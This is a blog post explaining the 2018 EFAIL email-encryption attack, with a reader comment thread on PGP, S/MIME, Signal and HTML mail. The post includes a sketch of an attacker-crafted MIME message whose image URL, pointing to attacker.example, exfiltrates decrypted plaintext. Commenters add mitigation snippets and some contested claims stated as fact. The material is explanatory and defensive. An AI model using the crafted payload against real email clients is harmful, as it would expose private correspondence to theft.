Details on a New PGP Vulnerability

A new PGP vulnerability was announced today. The vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects: if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.
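In the paper’s “direct exfiltration” variant, the attacker wraps the untouched ciphertext between two HTML parts so that, after decryption, the plaintext lands inside an image URL. A simplified sketch of such an attacker-crafted message (the attacker.example host, boundary string, and placeholder ciphertext are illustrative, not taken from the paper):

```
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/html

<img src="http://attacker.example/
--BOUNDARY
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

[original, unmodified ciphertext]
--BOUNDARY
Content-Type: text/html

">
--BOUNDARY--
```

A client that decrypts the middle part and renders all three parts as one HTML document will request http://attacker.example/ followed by the decrypted plaintext, handing it to the attacker’s web server.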

A few initial comments:

1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don’t mean to minimize the seriousness of this attack, but that is a consideration.

2. The vulnerability isn’t with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: “No decryption in the e-mail client,” and “disable HTML rendering.”

3. I’ve been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it’s not bug free.

3. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

I’ll post other commentaries and analyses as I find them.

EDITED TO ADD (5/14): News articles.

Slashdot thread.

Posted on May 14, 2018 at 1:36 PM


Questionair May 14, 2018 2:18 PM

Sorry for my ignorance, but if I am allowed a question:

What are the implications for all the phones marketed as secure PGP phones?

Bruce Schneier May 14, 2018 2:25 PM

“What are the implications for all the phones marketed as secure PGP phones?”

No idea.

Are there any left?

And weren’t those using PGP Voice, not e-mail?

Nightwish May 14, 2018 2:45 PM

Wait, the issue is that all the clients don’t split on the boundary before rendering? Read your RFCs, guys, even the web fixed this.

Clément May 14, 2018 2:45 PM

I think you might be mischaracterizing part of the attack: it doesn’t require modifying messages in transit. It only requires passively listening on outgoing messages to collect ciphertexts, and then sending a crafted HTML message to the victim.

Sergey Babkin May 14, 2018 3:01 PM

It’s strange that yesterday the EFF was publishing instructions on how to disable PGP, when it should have been publishing instructions on how to disable HTML processing (easy to do in Mozilla Thunderbird).
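For what it’s worth, a sketch of the relevant Thunderbird settings (pref names as of the Thunderbird releases current in 2018; worth double-checking against your version), settable via the Config Editor or a prefs.js fragment:

```
// Prefer the plain-text alternative when a message offers one.
user_pref("mailnews.display.prefer_plaintext", true);
// 1 = convert HTML-only messages to plain text before display.
user_pref("mailnews.display.html_as", 1);
// Keep remote content (images, styles) from being fetched.
user_pref("mailnews.message_display.disable_remote_image", true);
```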

Grant May 14, 2018 3:06 PM

Regarding #3:

Why is anyone using encrypted e-mail anymore, anyway?

I personally do and have been using S/MIME certificates for email signing and encryption for a number of years. I’m quite happy with it. I’ll still continue to use it despite #EFAIL.

I use S/MIME encryption between my personal and work email addresses and with other friends. We are looking for an easy way to communicate (at our leisure) that does not rely on a 3rd-party service (trusted certs aside) for our communications, so that casual observers and automated filtering systems can’t tell what we are discussing.

I prefer S/MIME over PGP/GPG because of its integration with most MUAs in the last ~20 years. I can spend < 15 minutes setting up my dad’s iPhone and then we can exchange encrypted email without him being any the wiser. He literally has no functional change in his end-user experience. PGP/GPG has never come close to that.

IMHO S/MIME and PGP/GPG work perfectly fine for what most people (that care) need or want. Many people don’t care enough to set it up. Some people want something stronger than S/MIME or PGP/GPG, though I suspect they aren’t using email (over the Internet) in the first place.

Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement.

I do not believe that encrypted e-mail is insurmountable. I feel that S/MIME and PGP/GPG can get good enough for what most people would want. — If you want something better, use a different solution.

Note: I want whatever solution I use to support store-and-forward communication methods. I do not want to have to rely on (near) real-time communications to establish an encrypted channel.

Finally: I believe in raising the noise level for those that really do need to hide their signal in the noise. Let my wife’s email reminder to pick up the milk on my way home help a civil rights activist adjust the signal-to-noise ratio ever so slightly more in their favor.

George H.H. Mitchell May 14, 2018 3:19 PM

Strongly agreeing with Grant’s comment above. PGP with Thunderbird plus Enigmail is far from “an insurmountably hard problem […]”. And Thunderbird is happy to disable HTML for you.

Glenda May 14, 2018 3:26 PM

Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement. If you need to communicate securely, use Signal.

Shouldn’t that quote read “Why is anyone using e-mail anymore?” Because why should anyone have to consider whether they “need to communicate securely”? People are not good at threat modeling. Privacy is a right, and if it’s impossible to have private e-mail, we should scrap e-mail altogether. Once we admit defeat we can try to come up with a proper solution—something federated and not controlled by one company, and that protects the metadata.

James May 14, 2018 3:50 PM

The problem is real. But, given this (I have no idea if it is real anyway): there are some e-mail clients that are not vulnerable. I never liked external content or flashy s..t in e-mail anyway, just plain old text and maybe attachments. Myself, I have blocked external crap in e-mail since forever (not only encrypted e-mail, but all e-mail). Loading external crap exposes you to a laundry list of threats; this PGP/GPG exploit is just one of them.

This reminds me of the PDF fiasco … PDF was supposed to be, well, a Portable Document Format, until they started adding crap to it. Images, videos, external content and other flashy s..t. And it became an unfixable nightmare …

James May 14, 2018 3:52 PM

As a side note, “public key” or not, usually you use encrypted communication with people you do know/trust …

Gerard van Vooren May 14, 2018 3:52 PM

@ Ratio,

Let’s get this straight: Tomorrow we will all know. That’s all.

Bruce Schneier May 14, 2018 4:01 PM

@ lisaev:

“Bruce, please don’t spread misinformation. There are no bugs in PGP, only in email clients mishandling warnings from GnuPG.”

Agreed. I believe I said that this is not a bug in PGP. That is what I meant to say here: “The vulnerability isn’t with PGP or S/MIME itself, but in the way they interact with modern e-mail programs.”

Bruce Schneier May 14, 2018 4:03 PM

@ Roger Nebel:

“Don’t send html – problem fixed.”

It has nothing to do with whether the sender sends HTML. It has to do with whether the attacker sends HTML, and how the e-mail recipient handles it.

James May 14, 2018 4:09 PM

@Bruce: My point exactly, the e-mail client should not handle it at all. Text.

Andy Sherman May 14, 2018 4:14 PM

The issue is really that many MIME implementations do a lousy job of error checking. An unterminated quoted string should be rejected or forcibly closed at the end of the part.

There is a whole host of MIME issues that should be de-fanged before allowing any interpreter (such as HTML) to process the text. Add this to the list.
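A minimal sketch of that “forcibly close” rule, assuming the client scans each decrypted part before concatenating it with its neighbours (a real implementation would use an HTML tokenizer rather than this character scan):

```python
def close_unterminated_quotes(html_part: str) -> str:
    """Forcibly close any attribute quote (and tag) left open at the
    end of a MIME part, so a following part cannot be swallowed into
    a URL. Simplified sketch only."""
    quote = None   # currently open quote character, if any
    in_tag = False
    for ch in html_part:
        if quote:
            if ch == quote:
                quote = None
        elif in_tag:
            if ch in ('"', "'"):
                quote = ch
            elif ch == '>':
                in_tag = False
        elif ch == '<':
            in_tag = True
    # Close whatever was left dangling at the part boundary.
    if quote:
        html_part += quote
    if in_tag:
        html_part += '>'
    return html_part
```

With a rule like this in place, an EFAIL-style unterminated `<img src="` in one part can no longer swallow the next part’s decrypted plaintext into its URL.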

Sancho_P May 14, 2018 4:16 PM

I don’t mean to split hairs, but …
Why is the headline “… New PGP Vulnerability” when it is a vulnerability of rendering HTML emails?
Btw, when was the old PGP vulnerability, just to refer to?

John Poffenbarger May 14, 2018 4:27 PM

Don’t use email? Why not? We have solved this problem and are not vulnerable to this type of attack. The features of a mature client like Outlook obliterate the limited abilities of Signal and WhatsApp. Instead of calling it bad and saying don’t use it, how about recognizing that there is in fact a viable solution?

James May 14, 2018 4:32 PM

@Andy Sherman , @Sancho_P, @John Poffenbarger: E-mail was not designed to “render” anything. It was designed just as a “dumb” method of sending messages, text messages. Then, someone got the idea to complicate things. Somehow similar to PDF …

James May 14, 2018 4:46 PM

All being said, this is not an encryption issue. This is an implementation issue… What makes this worse than some remote-execution / privilege-escalation bug? Does anyone read the monthly security bulletin from Google, with the laundry list of vulnerabilities discovered and patched every month? What makes this any more dangerous than the others?

Sancho_P May 14, 2018 5:45 PM


My point only was why to name “PGP” together with “vulnerability” here.

James May 14, 2018 5:49 PM

Sancho_P: probably because the exploit does the most damage to PGP … technically, clear-text e-mail should not be considered secure, but an encrypted one should …

Name required May 14, 2018 6:28 PM

Why is anyone using encrypted e-mail anymore, anyway?

I find it easier to get an anonymous email address than an anonymous phone number (for Signal), at least in my country. Also, many people like journalists only publish an email address and public key with no Signal number, so that is not always (or even often) an option.

Bruce Schneier May 14, 2018 6:36 PM

@ Sancho_P

“Why is the headline ‘… New PGP Vulnerability’ when it is a vulnerability of rendering HTML emails?”

Because that’s how it is being talked about in the press, and that’s how people will search for this topic.

Thoth May 14, 2018 6:43 PM

@all, Clive Robinson

I see this same old debate appearing again and it’s usually framed as Signal vs PGP Email or Encrypted Chat vs Encrypted Email.

The same answer and the same stark truth is that both Signal and PGP are insecure in every sense.

As I have always cautioned, your phones (iPhones, Androids et al.) already contain the perfect backdoor to trap you, and for that I have demonstrated a theoretical exercise by creating a firmware-based Clipper using just the ARM TrustZone in your phones in one of the Friday Squid posts.

Go ahead and happily use Signal while the fClipper exfiltrates all your Signal keys 🙂 .

That being said, the architecture of OpenPGP is not without its quirks, which really require an update.

At the end of the day, it is not the crypto protocol that the attacker will try to break; instead they attack the underlying systems and bubble the attacks up, which has become the method of choice these days.

Look at the likes of Spectre and Meltdown, and the continued wilful peddling of snake-oil security by security companies and the likes of Intel, which insistently claim that Intel SGX is still secure despite all the latest Spectre attacks, trying to push sales, lying to the public and playing down the significance of the attacks.

Use Signal instead of PGP ?

I wish that were true. @Clive Robinson: in the recent Friday Squid thread I posted about some vulnerabilities in Signal.

I would recommend staying off Signal and PGP unless you know what you are dealing with, as most people pin false hopes on them.

People might hate me for the above recommendations, but I prefer people not to have false hope and do things they don’t understand.

If you have something truly important, meet in person and discuss in private.

Dean May 14, 2018 6:46 PM

James, re: PDF

Before PDF, PostScript (also designed by Adobe) was the standard printing language. It’s a Turing-complete stack-based programming language, and this aspect later proved to be problematic; when Adobe designed PDF to replace it, they intentionally made it non-Turing-complete. That decision should have remained for all time…

…But, when these events were obscured by the mists of time and became legend…

Jack May 14, 2018 7:09 PM

Correction: the 2nd #3 should be #4

Not that big of a deal, but if you like to be correct… 🙂

Thoth May 14, 2018 7:10 PM

@all, Clive Robinson

As a continuation of my above post, and on a possibly off-topic but related note about “security technology”: these “Secure Enclaves” are built against us.

If we look at the original intent of all these “Secure Enclaves”, they are built to protect against the user, not to protect the user.

The original intent of these “Enclaves” is DRM, licensing, and letting big corporations control us and how we interact with our devices and content. It essentially puts us in a digital prison, them against us, with the “Enclaves” as a medium.

There are proposals to use these “Enclaves” to make digital communication (secure chat and email) more robust, but they fail to take into consideration that these “Enclaves” were originally intended to be used against their users. There is no chance of any secure communication using your COTS devices unless you take the additional steps that @Clive Robinson, Nick P, myself, maqp and many regulars have recommended: energy- and air-gap all these devices and manually “walk” the ciphertext and plaintext between dedicated machines and transmitters.

The architecture and design of “Enclaves” are meant to be used against us, so what gives us the confidence that, by building secure communication solutions on top of them, we can secure ourselves against their original design and intentions?

bob May 14, 2018 7:51 PM


I will add my voice to what others have said: I communicate exclusively with encrypted email. I know I’m one in a million; my point is that email does have significant advantages over Signal or WhatsApp. You should know, the EFF has recently released a paper re-evaluating their private communication tools scorecard, pointing out that people don’t like giving their phone number as an identifier. And you yourself said phone numbers are better than social security numbers for identifying people. Me? I don’t even own a phone.

Nick P May 14, 2018 8:14 PM

@ Bruce

“Why is anyone using encrypted e-mail anymore, anyway? ”

Easy: the Snowden leaks said NSA couldn’t hack it whereas they were smashing mobile platforms. That’s the highest level of attacker. If they can’t handle it or only rarely can, then I should be safe against most of the others with less resources, too. Now, how difficult is it to use? I was using a cheat sheet to remember the commands. Just a few of them. Encrypt a text or zip file for specific person’s email. Decrypt it with shorter command. Tedious, but simple. I scripted the harder parts. Tells me a usable front end could be made.

Now, that’s not the end of the benefits. GPG runs on a lot of platforms vs the two or three Signal is on. You can get an obfuscation benefit out of that one where your opponent isn’t quite clear on what you’re using. This works even better if there’s a simple device in front of it acting as a guard making sure incoming data only goes to specific apps instead of host OS as a whole. It also just requires terminal, text editor, and zip for my method. One could delete most of the code in the kernel and userlands with it still a usable solution.

Vuln in Implementation, Not in Encryption May 14, 2018 10:10 PM

@Nick P :

Encrypt a text or zip file for specific person’s email. Decrypt it with shorter command. Tedious, but simple. I scripted the harder parts. Tells me a usable front end could be made.

Certainly. When I worked for a demographics firm that received and sent plenty of datafiles from client firms each day, I built a tool that let other tools’ users submit a simple plaintext file to a certain folder on a server. That textfile contained just “encrypt” or “decrypt”, the path and filename of a datafile on any of our servers, a client’s passphrase if needed, and the name of the client’s public key stored on another of our servers.

My tool read the simple textfile (one line per datafile, you could do batches with a multiline textfile), prepared a proper PGP command, executed it with error-checking, and cleared the working memory so an intruder couldn’t harvest the data unless they compromised the actual processing.

So our toolbuilders doing various tasks could automate their encryption/decryption for various tasks just by having each tool write the simple plaintext file and post it to the working folder. The purpose might be a project manager just verifying an input record count; or a standard-production tech running a datafile through a standard processing tool, and preparing the output for delivery; or a custom programmer doing one-of-a-kind processing and preparing the output. Each worker, and even each toolmaker, didn’t need to know the details of PGP commands.
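The commenter’s control-file format and tool internals aren’t published, so the translation step can only be sketched. In this rough version, the tab-separated field layout (action, file path, optional passphrase, optional key name), the gpg flag choices, and the `.gpg` file-naming convention are all my assumptions:

```python
def build_pgp_command(line: str) -> list[str]:
    """Translate one line of the control file into a GnuPG command.
    The field layout is a guess at the format the commenter
    describes, not the real tool's."""
    action, path, passphrase, key = (line.split('\t') + ['', '', ''])[:4]
    if action == 'encrypt':
        cmd = ['gpg', '--batch', '--yes', '--encrypt',
               '--recipient', key, '--output', path + '.gpg', path]
    elif action == 'decrypt':
        cmd = ['gpg', '--batch', '--yes', '--decrypt',
               '--output', path.removesuffix('.gpg'), path]
        if passphrase:
            # A real tool should feed the passphrase via --passphrase-fd;
            # putting it on the command line leaks it to `ps`.
            cmd[1:1] = ['--pinentry-mode', 'loopback',
                        '--passphrase', passphrase]
    else:
        raise ValueError(f'unknown action: {action!r}')
    return cmd
```

Executing the resulting command with subprocess.run and checking its return code would cover the error-checking step the commenter describes.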

In practice the security depended mainly on the project managers working with client reps to exchange public keys and passphrases without using the same channels as the encrypted datafiles. (And not working from home, leaving written notes where they could be stolen, et cetera.) Any key-based system has those risks. This system took all the hard-to-remember parts out of everyone’s workflow while adding hardly any new vulnerability.

You could easily do this for the body of ordinary e-mails using a plain desktop PC or even a powerful smartphone. Then you would just have the key-distribution problem that exists with any PKI among a group that can’t meet in person once to exchange keys.

Gunter Königsmann May 14, 2018 11:32 PM

The real problem is that Thunderbird is willing to automatically load external objects in mails without even asking, and that it is possible both to add text to the mail before and after the encrypted part (including something that looks like the “this mail is encrypted” sign) and to span tags from there into the encrypted part, and to add things to the encrypted part, with most mail programs ignoring the “checksum has changed” message. While we are at it: creating counterfeit keys with the right fingerprint is easy.

Gunter Königsmann May 14, 2018 11:44 PM

Free extra vulnerability: create an address that looks like the real thing using weird Unicode chars and trick someone into believing that it is the real thing. It’s one of the rare cases that makes you a man-in-the-middle without requiring you to own the infrastructure.
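A rough illustration of catching such lookalike addresses by flagging mixed scripts (real clients should use the Unicode confusables data from UTS #39; this first-word-of-the-character-name heuristic is only a sketch):

```python
import unicodedata

def looks_spoofed(address: str) -> bool:
    """Flag addresses that mix Latin letters with lookalikes from
    other scripts (e.g. Cyrillic 'а' for Latin 'a')."""
    scripts = set()
    for ch in address:
        if ch.isalpha():
            name = unicodedata.name(ch, '')
            # The first word of a Unicode character name is usually
            # its script ("LATIN", "CYRILLIC", "GREEK", ...).
            scripts.add(name.split()[0] if name else '?')
    return len(scripts) > 1
```

An all-Latin address passes; one with a single substituted Cyrillic letter is flagged.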

Hmm May 15, 2018 12:44 AM

People chiding Bruce may not have noticed how suddenly and forcefully this was initially reported, or how quickly the specific details have developed. It was reported as a PGP issue because those were the folks being affected, and they had to take some immediate action to protect their data regardless of where the actual gremlin lived. Not everybody using HTML + remote images gives a flying crap about their email security (duh), but presumably those going to the trouble of PGP do care, right? So when those all-caps dire warnings came out and Bruce dutifully passed them along to the blog for obvious reasons, poking him for “disinformation” or such because the issue subsequently turns out to be trivial or limited to certain conditions is both showing up late to the pool party and not wearing your swimsuit properly.

safetonysteemit May 15, 2018 1:07 AM

Sorry Bruce, but I think this is fairly irresponsible journalism. It is not correct to call EFAIL a new vulnerability in PGP and S/MIME. This has been known since 2001, and it is to do with client-side implementation.

What is troubling is that the EFF told people to stop using PGP encryption; the correct response would be to turn off HTML and remote content in emails and use a client that actually does an integrity check on the message.

Hmm May 15, 2018 1:49 AM

“Me? I don’t even own a phone.”

Just how does that work, Bob? Pseudo-random hollering?

“you yourself said phone numbers are better than social security numbers for identifying people.”

You can get a new prepaid phone number trivially, but if you’re looking to not be advertising your presence why would you want to carry a radio beacon around everywhere you go anyway?

It’s a similar question to those who would be using HTML and remote images with PGP email.
If you’re trying to achieve a secure communication, why allow loose remote HTML junk on top?
You want to wear all white? You can, but stop eating sloppy joes on the bus.

Hmm May 15, 2018 2:13 AM

‘What is troubling is that EFF told people to stop using PGP encryption’

What they actually did say was stop using PGP encryption until they updated their security.

In this case the fix is simply turning off remote images / html, so there’s your security update pal. You’re welcome for the heads up if not 100% optimal off the bat.

Meanwhile, you got a warning that sought to prevent complete data compromise from an active exploit of a sensitive data source, perhaps one of the most sensitive data sources widely accessible on the internet as a whole. So as “wrong” as the EFF was, you’re not reading it in the correct light. Anyone who uninstalled PGP in the interim and updated it (as above) as the EFF actually said is doing just fine, right now. If they had their wits about them they wouldn’t even have changed keys; no loss at all.

If you’re going to shoot the messenger don’t miss, Jesus.

I hate filling names May 15, 2018 3:09 AM

I’ve read the paper, and it all depends on bypassing the message fingerprint check. Everything that is not covered by fingerprinting and encryption should be discarded without mercy. I think they underestimated the importance of message fingerprinting.
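The discard-without-mercy rule amounts to verify-then-render. A toy sketch with a bare HMAC standing in for OpenPGP’s own integrity protection (the MDC, or AEAD in newer drafts), so the key, tag, and function names here are illustrative only:

```python
import hashlib
import hmac

def verify_then_render(key: bytes, body: bytes, tag: bytes) -> bytes:
    """Refuse to hand a message body to any renderer unless its
    authentication tag verifies. Illustrative glue code: the point
    is the hard failure, not the particular MAC."""
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError('integrity check failed: discarding message')
    return body  # only now is it safe to decode/render
```

The clients EFAIL caught did the opposite: they rendered (and leaked) the plaintext even when the integrity check had already failed.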

James May 15, 2018 4:05 AM

Guys, remote content in e-mail should be disabled by default, period, encryption or no encryption. It exposes you to trackers and other nasty stuff. Especially for a secure email you do not need all the flashy crap that remote content can bring.

I don’t like Signal either, because it requires a phone number. However Signal protocol != Signal. There are other apps out there that use the Signal protocol / OMEMO and do not require a phone number. One of them is Conversations that can be used with any XMPP server. Technical users can host their own …
Of course this is null and void if one endpoint gets compromised.

Thoth: Secure enclaves / TEEs are basically built to protect the user from the user. They allow you to use a weak PIN code and enforce a hardware delay against brute forcing (until they don’t; see GrayKey). They are also used for hardware key derivation, random-number generation, probably DRM and a lot of other stuff. Verified boot has its advantages, as someone cannot change your system partitions without you noticing. However, you do not have to trust all this. Using a complex passphrase is the best practice, no matter the hardware. Speaking of DRM, show me an implementation that hasn’t been broken …

Hans May 15, 2018 5:13 AM

Why is anyone using encrypted e-mail anymore, anyway [..] use Signal.

Cool, so you will soon replace the GPG key on your contact page with a Signal phone number? Can’t wait.

On a more serious note: It saddens me how everyone is just using this occasion to trash the heroic efforts of all the people seriously concerned with improving the confidentiality of e-mail, while offering nothing in return. We do have an e-mail infrastructure, it is used, and we won’t replace it with some messenger silo. Solving confidentiality in a federated world is a hard research problem, and we should work on it, rather than tell people to stop communicating.

echo May 15, 2018 5:47 AM


This incident sounds like the patient/victim blaming that happens in UK healthcare: blaming or framing the issue as a PGP issue (i.e. a patient issue) instead of an email-application issue (read: doctor issue) and an external-services issue (read: bad communication between departments).


“Silos” are bad because they wrap up abuse behind an unaccountable and closed door.

I have to say, on reflection, I disagree with Bruce’s framing of this issue. The problem seems more akin to a professional-practice problem, and you have to ask why organisations with deep pockets are ignoring this. Mozilla is so bad they even tried to offload Thunderbird until there was pushback.

Clive Robinson May 15, 2018 6:06 AM

@ All,

You really should stop using HTML, especially HTML5, if you value any kind of security…

The reason is a mixture of “mission creep” and “feature creep” by the W3C.

I confidently predict a whole landslide of security issues from HTML especially HTML5 to happen over the next decade.

Thus the easiest way to avoid them is not to “buy into the ‘HTML everywhere’ hype”.

That is, there is no “one solution” to the vast variety of technical problems out there. You only have to look at things that have been deprecated, like Flash and Java, and their histories to see why they should not have been used the way they were, creating a myriad of security vulnerabilities. Put simply, the idea of “sandbox” security to execute unknown code on your local machine was one of those “fine in theory, dire in practice” issues. The more secure way of doing things is for the remote server to “do the work”; then security vulnerabilities in their coding are their issue, not yours.

If we want to be secure then the likes of JavaScript etc. need to be removed from the likes of web browsers; likewise, around 3/4 of HTML5 should never have been dreamt of, let alone put into the W3C working considerations.

The way to be secure is a lot more involved than “encryption”; it involves the correct management of three fundamental concepts,

1, Information communication.
2, Information processing.
3, Information storage.

Not just independently but together, and especially at the interfaces, where “choke point” control is most effective at segregation as well as management.

In the past we have talked about “The CIA triad” of,

1, Confidentiality.
2, Integrity.
3, Availability.

Unfortunately, when you think about it, these are “human ideals/values” that we then try to mangle into the way Information Processing, Storage and Communications work.

Mistakes will happen, frequently quite deliberately by design. Most often this happens at the interfaces, usually because they are frequently incomplete and thus made too permissive to get what users consider acceptable functionality. What users consider “acceptable functionality” is a complete disaster area waiting to happen.

As others have pointed out, even at the lowest levels HTML breaks the secure communications, storage and processing requirements, thus hemorrhaging side-channel information to both active and passive adversaries. It also bypasses all three of the CIA triad. Thus you would have thought alarm bells would ring in more than just one or two people’s heads…

And that’s all before including “interpretation” of complex data objects and code, which are all Turing complete or allow unauthorized behaviour of a local resource under second- or, worse, third-party control (think malware in revenue-raising adware).

In short, outside of its limited original design, “HTML et al. is a solution looking to make problems”, not “a solution to solve problems”. Oh, and it gets worse with every supposed “functional improvement” added by the W3C at the behest of others with short-sighted goals that in no way include user security; in fact the very opposite, because breaching user security is where their profit comes from…

Givon Zirkind May 15, 2018 6:06 AM

Interesting and practical. Why encrypt email? Irrespective of the failure of current encryption methods, the reason people want to encrypt email is…privacy.

As to the method of attack, brilliant. The weakest link. If you can’t go after the target, go around, under, get at a support. PGP is good. That isn’t the problem. Once the PGP encryption is removed then, you can get a copy by attacking the comm service, so to speak. Cute trick & method.

Practically speaking, why not just turn off HTML email, like never demanding resumes in text format?

Denton Scratch May 15, 2018 7:24 AM

@Clive “”HTML et al is a solution looking to make problems” not “a solution to solve problems”.”

Not sure who you were quoting, Clive; but whatever.

I disagree. For the most part, HTML5 doesn’t solve problems that are problems for me (the exception in my case is the media tag). But it does solve a lot of problems for one very large and powerful constituency: web marketers and advertisers. For that group, the insecurities in HTML5 are a feature, not a bug. It’s them that pushed HTML5 in the W3C, and when that failed (or made progress too slowly) they formed the WHATWG.

Hmm May 15, 2018 9:10 AM

HTML 5 exists where flash was the ubiquitous standard.

So let’s complain with that in mind at least.

5 is unlikely to outpace flash in terms of free gifts to malware devs in the near term.

UseSignal May 15, 2018 9:25 AM


There are other apps out there that use the Signal protocol / OMEMO and do not require a phone number. One of them is Conversations that can be used with any XMPP server. Technical users can host their own …

I will never get why some people always bring Conversations/XMPP into play when there is a discussion about secure messaging.

There is unencrypted fallback, finding “the right” server for you and your friends is a PITA, many server operators don’t even provide a privacy policy, and XMPP servers store all of your contacts, group memberships and much more in plain text (even if you enable OMEMO, which is still experimental and not standardized).

Hosting your own server to solve this big privacy issue implies that you really harden your server configuration and hope that no one hacks you. Moreover, all of your friends must be on the same server for you to control all of your data.

Btw: Yes, you need a phone number to use Signal. You can use an arbitrary phone number, though. This includes “Receive SMS” online services, which one can access using Tor. Far more privacy-friendly than using experimental encryption with servers that know everything about you.

vensi May 15, 2018 9:38 AM

I’m definitely not implying that Signal is bad, but it seems like a bad suggestion when people say “don’t use encrypted email, use Signal”. There are several reasons I would prefer not to:

1- Signal requires a phone number, and the Signal app can only be signed into one phone at a time. I’m not publishing a single phone number to the entire public web and then having it tied indefinitely to my phone.

2- Signal requires a phone. Consumer email is free. Even privacy conscious providers offer free versions that you could layer PGP on top of.

3- Rotation. Every time I want a new Signal number I would need to buy a new sim card, pop it in, and pay for it for the entirety of use. This is also assuming that I’m ok with the possibility that the phone number is re-issued after I get rid of the number.

TLDR- Signal’s primary weakness is its reliance on a phone and phone number.

Clive Robinson May 15, 2018 9:39 AM

@ Denton Scratch,

I disagree. For the most part, HTML5 doesn’t solve problems that are problems for me…

Er did you read what I wrote?

Because the rest of your comment is broadly the same as my last paragraph, so I’m not sure what it is you disagree with?

gmgj May 15, 2018 9:52 AM

A little off topic, but, I would be really happy if a few really smart guys got some backing to do a new email framework, standard, what you may call it along with some open source libraries. On the other hand, I think the computer security world should shift its focus from trying to get it perfect, to getting people to start using existing technologies and to committing to be responsive to needed changes.

The benefits of using the existing technologies outweigh the potential cost of their being exploited. There are billions of dollars being lost in fraudulent transactions every year using existing safeguards. If we believe we can totally prevent fraud, we are sadly mistaken. If we believe we will find a one size fits everything solution, we are sadly mistaken. No matter what, some people will still manage to shoot themselves in the foot, despite the safety.

Clive Robinson May 15, 2018 10:04 AM

@ vensi,

TLDR- Signal’s primary weakness is its reliance on a phone and phone number.

Whilst this is true, you left out the most important reason Signal is in effect a useless product security-wise.

Signal is an application designed to run entirely on the phone. Whilst it offers what appears to be a very very secure comms channel, it also puts the plaintext interface on the users phone.

History shows us, through the likes of the CarrierIQ debacle and several unrelated malware attacks, that getting at the plaintext output of applications that run entirely on a mobile phone or connected smart device is fairly close to “child’s play” when compared to breaking the crypto.

This sort of attack is known as an “end run attack” because it reaches around the application’s security end point and accesses its plaintext interface. This is a preferred method of attack where the attacker’s communications end point is beyond the application’s security end point.

Thus Signal has a glaringly obvious and well known security fault that cannot currently be fixed by its users. Thus it is more of a danger to privacy than a protector of privacy, because Signal traffic stands out and therefore acts as a red flag to state level attackers.

The solution to Signal’s glaring security weakness is,

    To extend the users security end point beyond the attackers communications end point.

Currently the only way for users to do this with Signal is to actually use an off device cipher or code then put this through Signal. If the cipher or code is sufficiently strong (say an OTP) then and only then will Signal be secure in use.

lucas May 15, 2018 11:12 AM

“A little off topic, but, I would be really happy if a few really smart guys got some backing to do a new email framework, standard, what you may call it along with some open source libraries.”

A new “framework” might be overkill. There are individual problems that could be solved by a small group of experimenters, while remaining SMTP-compatible. The GnuPG developers already have DNS-based proposals for end-to-end key distribution, and we can use DNSSEC to make that secure.

To hide metadata, we could use TCP-DNS over Tor to look up a .onion domain corresponding to the “real” recipient domain, then send mail to it via SMTP (the recipient might authenticate the sender similarly, via DNSSEC based on their domain). The Tor developers could additionally let people associate a nameserver with a .onion domain, to allow ICANN-independent mail.
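
The DNS-based key distribution lucas refers to exists in draft form as the OPENPGPKEY record (RFC 7929). A minimal sketch of how a client would derive the name to query — the actual DNS lookup and DNSSEC validation are omitted, and the function name is my own:

```python
import hashlib

def openpgpkey_qname(email: str) -> str:
    """Derive the DNS owner name for an RFC 7929 OPENPGPKEY lookup:
    SHA-256 of the local part, truncated to 28 octets, hex-encoded,
    and prefixed to _openpgpkey.<domain>."""
    local, _, domain = email.partition("@")
    digest = hashlib.sha256(local.encode("utf-8")).digest()[:28]
    return f"{digest.hex()}._openpgpkey.{domain}"

# The name a DNSSEC-validating resolver would query for alice@example.com:
print(openpgpkey_qname("alice@example.com"))
```

The hashing of the local part is there so that the record name does not trivially enumerate valid addresses, though the domain part remains visible to the resolver — which is where the Tor-based routing idea above comes in.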

M May 15, 2018 12:23 PM

@Clive Robinson

regarding “end run attacks”: doesn’t this apply to any means of communication which displays the unencrypted text on a screen? Getting a “screenshot” from a desktop system is actually easier than on a mobile device (so is probing other programs etc. to know when to take the “screenshot”).

RealFakeNews May 15, 2018 12:38 PM

Don’t encrypt/decrypt within the e-mail client?

What did I miss here?

The e-mail client has always been a security vulnerability, and I consider it as insecure as a web browser.

E-mail is good and de-centralized, and just pushing Signal (or worse, WhatsApp with its known privacy problems) is no solution at all.

I’m quite surprised at @Bruce Schneier and how he has posted on this issue.

Would someone please develop a basic browser and e-mail client without the junk? I can only surmise the browser and e-mail devs are on the payroll of the ad companies.

Jeffrey Deutsch May 15, 2018 7:14 PM

Gmail encrypts email — at least to and from certain domains. How secure do you think it is?

justinacolmena May 15, 2018 11:18 PM

Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, …

“The NSA” again. Ix-nay.

The vulnerability isn’t with PGP or S/MIME itself, … “disable HTML rendering.”

Sure. Problem solved.

